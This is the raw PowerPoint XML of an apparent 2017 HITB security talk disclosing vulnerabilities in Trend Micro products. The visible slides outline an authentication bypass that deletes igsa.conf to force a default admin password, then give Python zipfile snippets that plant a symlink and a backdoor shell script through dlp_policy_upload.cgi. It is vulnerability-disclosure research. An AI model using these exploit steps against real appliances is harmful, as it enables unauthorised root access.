              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>igsa.conf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Directory Traversal Authentication Bypass Vulnerability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Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>to exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="662940" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>triggers delete action of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>igsa.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="662940" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Appliance becomes unusable, sysadmin will be forced to restart the box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="662940" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Appliance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>will automatically create a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>igsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>with a default admin password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="662940" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>waits until the box is restarted and use default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Directory Traversal Authentication Bypass Vulnerability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How was it discovered?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>A technique was to inspect file system for changes in the last minute, after a logoff, by running a command such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>find /* -path /proc -prune -o -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>cmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Inotify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> can also be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Also inspecting key folder (/var/log/sessionid/ ) to check what happened after logoff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dlp_policy_upload.cgi zip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 smtClean="0"/>
              <a:t>Allows attackers to upload zip files that are extracted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Extracts into a predictable folder directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Can’t use traversal attacks in the zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>However, we can extract evil.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>How are we to exploit this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dlp_policy_upload.cgi zip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7" y="1905000"/>
            <a:ext cx="6780460" cy="344711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36" y="1922971"/>
            <a:ext cx="2719869" cy="3411169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4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dlp_policy_upload.cgi zip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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Stage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>– Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> zip to create the symlink</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean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zi = 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zipfile.ZipInfo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zi.filename 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u'</a:t>
            </a:r>
            <a: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  <a:t>si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zi.external_attr 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|= 0120000 &lt;&lt; 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16L</a:t>
            </a:r>
            <a:b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zi.compress_type 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zipfile.ZIP_STORED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3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z.writestr(zi, "/opt/TrendMicro/MinorityReport/bin/")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6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dlp_policy_upload.cgi zip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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Stage 2 – Upload the 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> zip to write into the symlinked directory</a:t>
            </a:r>
            <a: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zi = zipfile.ZipInfo("</a:t>
            </a:r>
            <a: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  <a:t>si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/dlp_kill.sh")</a:t>
            </a:r>
            <a:b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zi.external_attr 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= 0777 &lt;&lt; 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16L</a:t>
            </a:r>
            <a:b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z.writestr(zi, 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_get_bd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())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5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dlp_policy_upload.cgi zip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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Reset the admin’s password back to ‘admin123’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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Login and upload 2 zip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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Extract the zip’s, overwriting a shell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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Trigger shell script from CGI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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>#Trend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dlp_policy_upload.cgi zip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760"/>
            <a:ext cx="12188825" cy="504062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1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</Template>
  <TotalTime>39096</TotalTime>
  <Words>3712</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>1075</Paragraphs>
  <Slides>122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0" baseType="lpstr">
      <vt:lpstr>Chalkduster</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Chalkboard 16x9</vt:lpstr>
      <vt:lpstr>Bitmap Image</vt:lpstr>
      <vt:lpstr>I got 99 trend’s and a # is all of them!</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>About Us</vt:lpstr>
      <vt:lpstr>About Us</vt:lpstr>
      <vt:lpstr>What This Presentation is NOT about!</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>Targets</vt:lpstr>
      <vt:lpstr>Testing approach</vt:lpstr>
      <vt:lpstr>Testing approach and methodology</vt:lpstr>
      <vt:lpstr>Testing approach</vt:lpstr>
      <vt:lpstr>Testing Approach</vt:lpstr>
      <vt:lpstr>Testing Approach</vt:lpstr>
      <vt:lpstr>Testing Approach</vt:lpstr>
      <vt:lpstr>Testing Approach</vt:lpstr>
      <vt:lpstr>Testing Approach</vt:lpstr>
      <vt:lpstr>Success!</vt:lpstr>
      <vt:lpstr>Pitfalls &amp; difficulties</vt:lpstr>
      <vt:lpstr>Pitfalls &amp; difficulties</vt:lpstr>
      <vt:lpstr>Targets</vt:lpstr>
      <vt:lpstr>Smart Protection Server</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>Approach</vt:lpstr>
      <vt:lpstr>wcs_bwlists_handler Cmd Injection</vt:lpstr>
      <vt:lpstr>Elevation of Privileges</vt:lpstr>
      <vt:lpstr>Elevation of Privileges</vt:lpstr>
      <vt:lpstr>Elevation of Privileges</vt:lpstr>
      <vt:lpstr>Combining the vulnerabilities</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Data Loss Prevention</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>Under the hood</vt:lpstr>
      <vt:lpstr>How many vulnerabilities in this product?</vt:lpstr>
      <vt:lpstr>Attack Surface</vt:lpstr>
      <vt:lpstr>Attack Surface</vt:lpstr>
      <vt:lpstr>dlpCrawlerServerInvoker Deserialization of Untrusted Data</vt:lpstr>
      <vt:lpstr>dlpCrawlerServerInvoker Deserialization of Untrusted Data</vt:lpstr>
      <vt:lpstr>dlpCrawlerServerInvoker Deserialization of Untrusted Data</vt:lpstr>
      <vt:lpstr>dlpCrawlerServerInvoker Deserialization of Untrusted Data</vt:lpstr>
      <vt:lpstr>dlpCrawlerServerInvoker Deserialization of Untrusted Data</vt:lpstr>
      <vt:lpstr>Unauthenticated Stored Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Unauthenticated Stored Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Unauthenticated Stored Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Unauthenticated Stored Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Unauthenticated Stored Cross Site Scripting</vt:lpstr>
      <vt:lpstr>KeyView</vt:lpstr>
      <vt:lpstr>KeyView</vt:lpstr>
      <vt:lpstr>KeyView</vt:lpstr>
      <vt:lpstr>RTF fonttbl Tag Parsing Stack Buffer Overflow</vt:lpstr>
      <vt:lpstr>RTF fonttbl Tag Parsing Stack Buffer Overflow</vt:lpstr>
      <vt:lpstr>RTF fonttbl Tag Parsing Stack Buffer Overflow</vt:lpstr>
      <vt:lpstr>RTF fonttbl Tag Parsing Stack Buffer Overflow</vt:lpstr>
      <vt:lpstr>KeyView - RTF fonttbl Tag Parsing Stack Buffer Overflow</vt:lpstr>
      <vt:lpstr>Control Manager</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>ProgressReportCGI SQL Injection</vt:lpstr>
      <vt:lpstr>ProgressReportCGI SQL Injection</vt:lpstr>
      <vt:lpstr>AdHocQuery_Processor SQL Injection</vt:lpstr>
      <vt:lpstr>AdHocQuery_Processor SQL Injection</vt:lpstr>
      <vt:lpstr>modDLPTemplateMatch_drildown File Inclusion</vt:lpstr>
      <vt:lpstr>modDLPTemplateMatch_drildown File Inclusion</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>InterScan Web Security</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>Patch Bypass</vt:lpstr>
      <vt:lpstr>Patch Bypass</vt:lpstr>
      <vt:lpstr>Other people’s findings</vt:lpstr>
      <vt:lpstr>doPostMountDevice Unauthenticated Command Injection Vulnerability</vt:lpstr>
      <vt:lpstr>doPostMountDevice Unauthenticated Command Injection Vulnerability</vt:lpstr>
      <vt:lpstr>doPostMountDevice Unauthenticated Command Injection Vulnerability</vt:lpstr>
      <vt:lpstr>doPostMountDevice Unauthenticated Command Injection Vulnerability</vt:lpstr>
      <vt:lpstr>doPostMountDevice Unauthenticated Command Injection Vulnerability</vt:lpstr>
      <vt:lpstr>doPostMountDevice Unauthenticated Command Injection Vulnerability</vt:lpstr>
      <vt:lpstr>Patch</vt:lpstr>
      <vt:lpstr>Patch</vt:lpstr>
      <vt:lpstr>Patch</vt:lpstr>
      <vt:lpstr>Patch</vt:lpstr>
      <vt:lpstr>uihelper Elevation of Privilege </vt:lpstr>
      <vt:lpstr>uihelper.sh Elevation of Privilege </vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Threat Discovery Appliance</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>Directory Traversal Authentication Bypass Vulnerability </vt:lpstr>
      <vt:lpstr>dlp_policy_upload.cgi zip extraction</vt:lpstr>
      <vt:lpstr>dlp_policy_upload.cgi zip extraction</vt:lpstr>
      <vt:lpstr>dlp_policy_upload.cgi zip extraction</vt:lpstr>
      <vt:lpstr>dlp_policy_upload.cgi zip extraction</vt:lpstr>
      <vt:lpstr>dlp_policy_upload.cgi zip extraction</vt:lpstr>
      <vt:lpstr>dlp_policy_upload.cgi zip extraction</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Bonus for #HITB2017AMS !</vt:lpstr>
      <vt:lpstr>But wait, there's more!</vt:lpstr>
      <vt:lpstr>Mobile Security for Enterprise</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>It’s a zero-day, sorry!</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>SafeSync for Enterprise</vt:lpstr>
      <vt:lpstr>About</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>Hunting for vulnerabilities</vt:lpstr>
      <vt:lpstr>Hunting for vulnerabilities</vt:lpstr>
      <vt:lpstr>Hunting for vulnerabilities</vt:lpstr>
      <vt:lpstr>_get_user_hpassword SQL Injection</vt:lpstr>
      <vt:lpstr>_get_user_hpassword SQL Injection</vt:lpstr>
      <vt:lpstr>_get_user_hpassword SQL Injection</vt:lpstr>
      <vt:lpstr>Overall Results</vt:lpstr>
      <vt:lpstr>Overall Results</vt:lpstr>
      <vt:lpstr>Thanks!</vt:lpstr>
      <vt:lpstr>Come and train with us  </vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Demos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got 99 trend’s and a # is all of them!</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>374</cp:revision>
  <cp:lastPrinted>2017-04-11T17:28:44Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-27T17:31:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-13T09:03:42Z</dcterms:modified>
</cp:coreProperties>
</file>